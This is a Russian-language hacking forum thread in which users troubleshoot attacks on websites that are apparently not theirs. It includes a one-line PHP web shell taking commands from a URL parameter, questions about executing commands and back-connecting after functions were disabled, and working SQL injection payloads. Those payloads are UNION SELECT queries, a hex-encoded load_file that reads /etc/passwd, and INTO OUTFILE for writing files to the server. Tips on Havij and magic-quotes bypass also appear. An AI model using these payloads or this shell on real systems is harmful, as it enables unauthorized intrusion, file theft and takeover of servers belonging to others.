Старый 25.03.2015, 04:53   #3391
Shadowfolder
Banned
 
Регистрация: 25.01.2012
Сообщений: 26
Репутация: -8
По умолчанию

На шелле перестали выполняться командные строки, даже если залить файл <? system($_GET['c']); ?> не выполняет.
посмотрел, я короче и Disabled PHP Functions: system, exec, shell_exec, passthru, popen, proc_open, parse_ini_file, show_shource, symlink, escapeshellarg,escapeshellcmd,proc_close,curl_exec
шелл мертв можно считать? есть способ выполнить что-то через коммандную строку или подключиться? бэкконект тоже перестал делать
Shadowfolder вне форума   Ответить с цитированием
Старый 25.03.2015, 14:18   #3392
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

Shadowfolder,
Perl, SSI помогут



Цитата:
Сообщение от faza02 Посмотреть сообщение
похоже на waf. havij pro версии поддерживает обход, попробуйте разные комбинации обхода
Не похоже на waf, даже обычный хавидж справляется, т.е. 1,15 free, который "ломится" напрямую. А вот ручками какой-то косяк.

PS Версия 1,17, которая имеет функцию записи в файл при наличии привилегий, не пишет, хотя читает.
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica

Последний раз редактировалось nomad; 25.03.2015 в 15:04..
nomad вне форума   Ответить с цитированием
Старый 25.03.2015, 16:26   #3393
faza02
 
Аватар для faza02
 
Регистрация: 24.12.2010
Сообщений: 77
Репутация: 14
По умолчанию

Цитата:
Сообщение от nomad Посмотреть сообщение
Shadowfolder,
Perl, SSI помогут





Не похоже на waf, даже обычный хавидж справляется, т.е. 1,15 free, который "ломится" напрямую. А вот ручками какой-то косяк.

PS Версия 1,17, которая имеет функцию записи в файл при наличии привилегий, не пишет, хотя читает.
тогда отснифайте запрос, который он отправляет
faza02 вне форума   Ответить с цитированием
Старый 25.03.2015, 18:36   #3394
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

Цитата:
Сообщение от faza02 Посмотреть сообщение
тогда отснифайте запрос, который он отправляет
id=999999.9 union all select concat(0x7e,0x27,version(),0x27,0x7e),null,null,nu ll,null--

Теперь в браузере есть вывод, спасибо за идею.

Каким образом в таком запросе реализовать запись в файл?
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica

Последний раз редактировалось nomad; 25.03.2015 в 18:39..
nomad вне форума   Ответить с цитированием
Старый 26.03.2015, 13:22   #3395
faza02
 
Аватар для faza02
 
Регистрация: 24.12.2010
Сообщений: 77
Репутация: 14
По умолчанию

Цитата:
Сообщение от nomad Посмотреть сообщение
id=999999.9 union all select concat(0x7e,0x27,version(),0x27,0x7e),null,null,nu ll,null--

Теперь в браузере есть вывод, спасибо за идею.

Каким образом в таком запросе реализовать запись в файл?
это точно mysql? вообще, все как обычно. select '<?phpinfo();?>',null,null,null,null into outfile '/tmp/bla.txt'--
уверены, что есть все условия для заливки?
faza02 вне форума   Ответить с цитированием
Старый 26.03.2015, 13:30   #3396
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

Цитата:
Сообщение от faza02 Посмотреть сообщение
это точно mysql? вообще, все как обычно. select '<?phpinfo();?>',null,null,null,null into outfile '/tmp/bla.txt'--
уверены, что есть все условия для заливки?
mysql 5.5.4-m3
file_priv=Y
Любая попытка сформировать запрос для записи выдает 404 ошибку
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Старый 26.03.2015, 13:50   #3397
BigBear
 
Регистрация: 26.07.2012
Сообщений: 134
Репутация: 51
По умолчанию

MQ off ?
__________________
Первый VPN на основе Эллиптической криптографии. Телепортируйся в любой момент, будь невидимым с multi-vpn.biz
И да, это реклама. Просто очень нужен VPN.
BigBear вне форума   Ответить с цитированием
Старый 26.03.2015, 14:45   #3398
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

Цитата:
Сообщение от BigBear Посмотреть сообщение
MQ off ?
Точно не знаю, но, скорее все, кавычки включены.
999999.9%20union%20all%20select%20(load_file(0x2f6 574632f706173737764)),null,null,null,null--
выводит /etc/passwd
а 999999.9%20union%20all%20select%20(load_file(%27/etc/passwd%27)),null,null,null,null--
уже не выводит, выдает 404 ошибку.
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Старый 26.03.2015, 15:37   #3399
faza02
 
Аватар для faza02
 
Регистрация: 24.12.2010
Сообщений: 77
Репутация: 14
По умолчанию

это и ответ на ваш вопрос. при некорректном запросе - 404, при корректном - /etc/passwd
faza02 вне форума   Ответить с цитированием
Старый 26.03.2015, 16:44   #3400
BigBear
 
Регистрация: 26.07.2012
Сообщений: 134
Репутация: 51
По умолчанию

заливка через into outfile / into dumpfile работает либо при выключенных MQ, либо при двойном запросе как в методе Scipio
__________________
Первый VPN на основе Эллиптической криптографии. Телепортируйся в любой момент, будь невидимым с multi-vpn.biz
И да, это реклама. Просто очень нужен VPN.
BigBear вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot